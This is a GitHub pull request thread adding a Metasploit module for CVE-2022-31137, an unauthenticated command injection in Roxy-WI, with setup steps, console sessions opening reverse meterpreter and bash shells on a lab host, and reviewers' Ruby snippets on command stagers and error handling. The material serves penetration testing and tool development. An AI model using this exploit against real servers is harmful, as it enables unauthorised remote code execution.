Add Roxy-WI (CVE-2022-31137) Remote Code Execution exploit
rapid7/metasploit-framework pull request #16793
Opened 2022-07-19 18:33 UTC by ncilengir

### Add Roxy-WI (CVE-2022-31137) Remote Code Execution exploit

This module exploits command injection vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user

In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator fun without needing any credentials. 
Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user.

Technical details about the vulnerability can be found at [here](https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/) .

### Setup

Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.

[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)

```
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py 
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/roxywi_exec`
4. Set `RHOST`
5. Set `LHOST`
6. Set `USERNAME`
7. Set `PASSWORD`
8. Run `exploit`
9. Do: `run`
10. You should get a shell.
11. **Verify** that you are getting `meterpreter` session.

## Scenarios

```
msf6 >
msf6 > use exploit/linux/http/roxywi_exec 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxywi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxywi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxywi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxywi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300

meterpreter > ls
Listing: /var/www/haproxy-wi/app
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
```

You can also use cmd payloads.

```
msf6 >
msf6 > use exploit/linux/http/roxywi_exec 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxywi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxywi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxywi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/mailcleaner_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300

id
uid=1000(xxx) gid=1000(xxx) groups=1000(xxx)
```

2022-07-19 19:08 UTC, smcintyre-r7 commented on modules/exploits/linux/http/roxy-wi_exec.rb
> +          ],
This isn't necessary any more. You should be able to delete the whole definition and the conversion down on L106/107 in favor of the user just specifying `cmd/unix/python/meterpreter/reverse_tcp` ad their payload. Metasploit will handle the conversion automatically into a command in a similar manner to what you're already doing. This is a relatively new feature.

IIRC if you remove the `DefaultOptions` below the Python Meterpreter will actually be selected automatically.

2022-07-19 20:03 UTC, gwillcox-r7 commented
https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/ is no longer accessible, will update the description with an appropriate link.

2022-07-19 20:19 UTC, gwillcox-r7 commented
Looks like both `tools/dev/msftidy_docs.rb` as well as the above steps need to be run and changes applied to meet RuboCop specifications. Will do a quick run through now and upload changes.

2022-07-19 20:49 UTC, gwillcox-r7 commented
Your examples here seem to showcase using both msf6 and msf5, not sure if that was a copy paste error but just something to note on your description.

2022-07-19 20:59 UTC, gwillcox-r7 commented
Fixed up invalid CVE format since we put the CVE number minus the `CVE-` part in that field, and also included the `Notes` section described at https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html which all exploits are now required to include to denote their reliability and side effects.

2022-07-19 21:12 UTC, gwillcox-r7 commented
> In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator fun without needing any credentials. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user.


I was under the impression according to the advisory that 6.1.1.0 was the patched version of this code? Is this not the case?

2022-07-20 04:56 UTC, bcoles commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    })
This request in `check` and `exploit` is effectively the same. You could implement an `execute_command` method which take a command as an argument and returns the response from `send_request_cgi`.

This would also allow modifying the module to use a command stager which supports executing native payloads.

2022-07-20 11:42 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    })
You can find more details about command stagers in the documentation [here](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin) and a more advanced example [here](https://github.com/rapid7/metasploit-framework/blob/e46a71f59539cb17d7cbf3f32ca5980793dfd25a/modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb).

2022-07-21 12:14 UTC, ncilengir commented on modules/exploits/linux/http/roxy-wi_exec.rb
> +          ],
Thx ! Done at  [d23c175](https://github.com/rapid7/metasploit-framework/pull/16793/commits/d23c175f28f229838e90622cae1e1f758fd2aab7)

2022-07-21 12:16 UTC, ncilengir commented
> 

Yes, something went wrong there. Fixed in [135a25b](https://github.com/rapid7/metasploit-framework/pull/16793/commits/135a25be4dcc18c58d39592a2944fdc237184b1f).

2022-07-21 12:21 UTC, ncilengir commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    })
Thx for the info and references. Updated and added CmdStager at [d23c175](https://github.com/rapid7/metasploit-framework/pull/16793/commits/d23c175f28f229838e90622cae1e1f758fd2aab7).

2022-07-21 12:22 UTC, ncilengir commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    end
Added AutoCheck at [d23c175](https://github.com/rapid7/metasploit-framework/pull/16793/commits/d23c175f28f229838e90622cae1e1f758fd2aab7).

2022-07-21 12:50 UTC, ncilengir commented
> > In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator fun without needing any credentials. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user.
> 
> I was under the impression according to the advisory that 6.1.1.0 was the patched version of this code? Is this not the case?

The version in the description is correct. The vulnerability was fixed in 6.1.1.0, but it was not released as a new version. Since a new version is not released when they fix the vulnerabilities, systems with 6.1.1.0 installed before vulnerabilities are affected.

for example; 
6.1.1.0 before patch: [cfb65d9](https://github.com/hap-wi/roxy-wi/commit/cfb65d9c6bd5724a74d5cb356709aa586ecd7b83), [2e060eb](https://github.com/hap-wi/roxy-wi/commit/2e060eb8019ff5b6b1644cb9f93d25465111440b)
6.1.1.0 after patch:[11aa182]( https://github.com/hap-wi/roxy-wi/commit/11aa1825999c8711edd197df82b7267e3a646614)

2022-07-21 13:46 UTC, gwillcox-r7 commented
> > > In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator fun without needing any credentials. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user.
> > 
> > 
> > I was under the impression according to the advisory that 6.1.1.0 was the patched version of this code? Is this not the case?
> 
> The version in the description is correct. The vulnerability was fixed in 6.1.1.0, but it was not released as a new version. Since a new version is not released when they fix the vulnerabilities, systems with 6.1.1.0 installed before vulnerabilities are affected.
> 
> for example; 6.1.1.0 before patch: [6d6b4e0](https://github.com/hap-wi/roxy-wi/commit/6d6b4e0babfddf0a0f28f3f7349923a781c844a2) 6.1.1.0 after patch: [cfb65d9](https://github.com/hap-wi/roxy-wi/commit/cfb65d9c6bd5724a74d5cb356709aa586ecd7b83), [2e060eb](https://github.com/hap-wi/roxy-wi/commit/2e060eb8019ff5b6b1644cb9f93d25465111440b)

So this is odd cause if I look at https://github.com/hap-wi/roxy-wi/compare/v6.1.0.0...v6.1.1.0 which compares the release tags, I can see that v6.1.1.0 contains the changes to the `app/options.py` file with the fixes?

2022-07-21 14:33 UTC, ncilengir commented
> So this is odd cause if I look at [hap-wi/roxy-wi@v6.1.0.0...v6.1.1.0](https://github.com/hap-wi/roxy-wi/compare/v6.1.0.0...v6.1.1.0) which compares the release tags, I can see that v6.1.1.0 contains the changes to the `app/options.py` file with the fixes?

The vulnerability was fixed in 6.1.1.0, but the version I tested is 6.1.1.0. Users using 6.1.1.0 are still affected by the vulnerability because the same version has been modified. That's why it creates confusion.

if the server has these patches and is not updating to 6.1.2.0, it is still vulnerable. But i think, it's not a major issue, i can fix it.
You can see vulnerable files in version 6.1.1.0;
[hap-wi/roxy-wi/app/options.py@v6.1.1.0](https://github.com/hap-wi/roxy-wi/blob/8e9b5f861a188822e5560f42c1f67fa07dc63523/app/options.py) and [hap-wi/roxy-wi/app/funct.py@v6.1.1.0](https://github.com/hap-wi/roxy-wi/blob/8e9b5f861a188822e5560f42c1f67fa07dc63523/app/funct.py)

2022-07-21 21:46 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    end
Verified resolved. Closing this issue.

2022-07-21 21:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy-wi_exec.rb
> +          ],
This isn't quite appropriately fixed. Will be reviewing this code and making some recommendations r.e this.

2022-07-21 23:25 UTC, gwillcox-r7 requested changes

2022-07-21 23:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +  end
This is not good error handling. For one, you know the error that was encountered, yet you are telling the user you don't know what the error was that was encountered. Secondly, we have other failure codes as listed at https://www.rubydoc.info/github/rapid7/metasploit-framework/Msf/Module/Failure specifically designed to handle some common scenarios like these.

Replaced this with the proper error handling code for this situation and updated the message to be more descriptive.

```suggestion
  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
    fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
  end
```

2022-07-21 23:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    return CheckCode::Safe("Check URI Path, unexpected HTTP response code: #{res.code}.") unless res.code == 200
This response code is not unexpected if we are returning CheckCode::Safe here. We should have a set scenario that we expect where we deem the host to not be vulnerable to the vulnerability we are exploiting. Given previous changes to this area of the code I want to pass this back to you so you can double check this what we are expecting and update the message accordingly.

2022-07-21 23:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    res = execute_command('id')
This won't work as you are not allowed to call `fail_with` from a `check` method, and `execute_command` will call `fail_with` in its current setup.

2022-07-21 23:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    else
```suggestion
  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
    fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
  else
```

2022-07-21 23:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    print_status 'Trying to detect command injection vulnerability.'
Both of these comments don't make sense. You aren't detecting the command injection vulnerability since you aren't calling `check` here, and you shouldn't be at this point anyway (since `check` will likely have been called before unless `set AutoCheck false` was run in which case the user explicitly asked not to check the target before trying to exploit so you still wouldn't want to detect things here).

Additionally the wording "Generating payload" doesn't make sense cause your sending a crafted command to the target here, not just generating a encoded payload, so it doesn't capture the full context of what your next steps are doing.

Finally this should be `print_status(<message>)` to maintain consistent formatting throughout this module.

2022-07-22 10:29 UTC, cdelafuente-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +      end
The `execute_cmdstager` method needs to be called to begin the command stager. This method allows you to use any kind of payload (binary, script, etc.) and passes it automatically to the `execute_command` as a text command. This method will take care of sending the command to the target, which is what your `execute_command` method does. If the payload is too large, the command stager will split it in several parts and call `execute_command` passing each part wrapped in a text command. You don't have to do anything to rebuild the final payload, the sequence of commands will take care of this automagically. Please refer to the [documentation](https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html#the-msfexploitcmdstager-mixin) for more details.

So, a common pattern is to setup multiple targets, for example one for shell payloads and another one for binary payloads. I believe Roxy-WI only work on *nix systems, so it is simple:
```ruby
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix (In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :in_memory
            }
          ],
          [
            'Linux (Dropper)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper
            }
          ]
        ],
```

and do this to call `execute_cmdstager` when necessary:
```ruby
    case target['Type']
    when :in_memory
      execute_command(payload.encoded)
    when :dropper
      execute_cmdstager
    end
```
That's it. Feel free to ask if you have questions or difficulties.

2022-07-25 15:36 UTC, gwillcox-r7 commented
Morning @ncilengir, there appears to still be a few comments open that you haven't gotten around to reviewing. If any of them are confusing please let me know. If I don't hear anything by end of today I'll assume your busy and I'll go ahead and make the edits so long since I'd like to try get this out the door in time for Thursday's release cut so that it will be shipped with the next release of Metasploit.

2022-07-25 16:09 UTC, ncilengir commented
> Morning @ncilengir, there appears to still be a few comments open that you haven't gotten around to reviewing. If any of them are confusing please let me know. If I don't hear anything by end of today I'll assume your busy and I'll go ahead and make the edits so long since I'd like to try get this out the door in time for Thursday's release cut so that it will be shipped with the next release of Metasploit.

Hi @gwillcox-r7, I'm sorry for the delay. I applied the changes. Syntax checking was also done with rubocop and msftidy_docs.

2022-07-25 16:15 UTC, ncilengir reviewed
Apply suggestions from code review

2022-07-25 16:16 UTC, ncilengir commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +          ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory
This link will be active today or tomorrow. There is no problem.

2022-07-25 17:09 UTC, gwillcox-r7 requested changes

2022-07-25 17:09 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
> +Set `TARGETURI` if the Roxy-WI is installed at a custom path.
So your explaining what TARGETURI does by.....asking the user to refer to the definition of TARGETURI here again? This doesn't make any sense as now you have a definition which points to itself as the explanation. You previous text was fine, this new one is just confusing.

2022-07-25 17:09 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
> +Python 3.10.4
This should go in the Roxy line above, though I appreciate you including this!

2022-07-25 17:09 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
>  ```
We probably want to keep this information here to showcase what privileges we actually get when we get the shell. Removing this information removes important info which shows the end user what we gain by exploiting this vulnerability.

2022-07-25 17:42 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    res = execute_command('id')
Still not resolved, unmarking as resolved.

2022-07-25 18:01 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
>  ```
On second look we will also have to redo these due to output changes as well

2022-07-25 18:06 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    res = execute_command('id')
Fixed this in https://github.com/rapid7/metasploit-framework/pull/16793/commits/72b1dbfeee3a7aa69916b427eeed6f73a85f4a9a

2022-07-25 18:06 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
> +Set `TARGETURI` if the Roxy-WI is installed at a custom path.
Fixed in https://github.com/rapid7/metasploit-framework/pull/16793/commits/72b1dbfeee3a7aa69916b427eeed6f73a85f4a9a

2022-07-25 18:07 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
>  ```
@ncilengir Please stop marking issues that are not resolved as resolved, it makes it hard for me to keep track of which issues we still need to address.

2022-07-25 18:09 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +    return CheckCode::Safe("Check URI Path, unexpected HTTP response code: #{res.code}.") unless res.code == 200
Addressed this a bit more in https://github.com/rapid7/metasploit-framework/pull/16793/commits/72b1dbfeee3a7aa69916b427eeed6f73a85f4a9a since it wasn't quite there by adding a if...elsif...else statement into the code.

2022-07-25 18:10 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +  end
Had to update this in https://github.com/rapid7/metasploit-framework/pull/16793/commits/72b1dbfeee3a7aa69916b427eeed6f73a85f4a9a since technically this function was being called by `check` and we can't have functions call `fail_with` if they are also being called by the `check` method at some point.

2022-07-25 18:12 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy_wi_exec.rb
> +          ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory
Leaving this issue open until the link goes live as this comment is still outstanding.

2022-07-25 18:16 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
> +```
Updated this in https://github.com/rapid7/metasploit-framework/pull/16793/commits/72b1dbfeee3a7aa69916b427eeed6f73a85f4a9a to move this to its own header.

2022-07-25 18:20 UTC, gwillcox-r7 commented
Alright code review is done, will move on to testing the module now 🥳

2022-07-25 19:16 UTC, gwillcox-r7 commented
Alright from testing looks like things are working as expected against a [v6.1.0.0](https://github.com/hap-wi/roxy-wi/releases/tag/v6.1.0.0) release of the software 👍 I updated the scenario documentation accordingly since the messaging was a little out of date and I wanted to include both the in-memory and file-dropper version.

2022-07-25 19:24 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/roxy_wi_exec.md
>  ```
Resolved in https://github.com/rapid7/metasploit-framework/pull/16793/commits/74496c1a299d76eefd8a5009fe4096d6d587e489

2022-07-25 19:24 UTC, gwillcox-r7 approved these changes

2022-07-25 19:27 UTC, gwillcox-r7 commented on modules/exploits/linux/http/roxy-wi_exec.rb
> +          ],
This has since been fixed with more recent code updates.

2022-07-25 19:28 UTC, gwillcox-r7 commented
@ncilengir Going to wait for tests to finish then will land this into the framework. Thanks for your patience and assistance on this and congrats on your first module PR to Metasploit!

2022-07-25 19:36 UTC, ncilengir commented
> @ncilengir Going to wait for tests to finish then will land this into the framework. Thanks for your patience and assistance on this and congrats on your first module PR to Metasploit!

Thanks for your help 🤘🏼

2022-07-25 20:00 UTC, gwillcox-r7 commented
Rebased to reduce commits down and clean up commit history before landing.

2022-07-25 21:21 UTC, gwillcox-r7 commented
Landed with https://github.com/rapid7/metasploit-framework/commit/4def2e56bc091ce2cb2e46560e6f461718ca8d85. Sorry for the oddities here, seems like GitHub got a bit confused since I rebased here but landed version somehow didn't get the rebase updates :/

Code should be going out to customers on Thursday though.

2022-07-25 21:42 UTC, closed without merging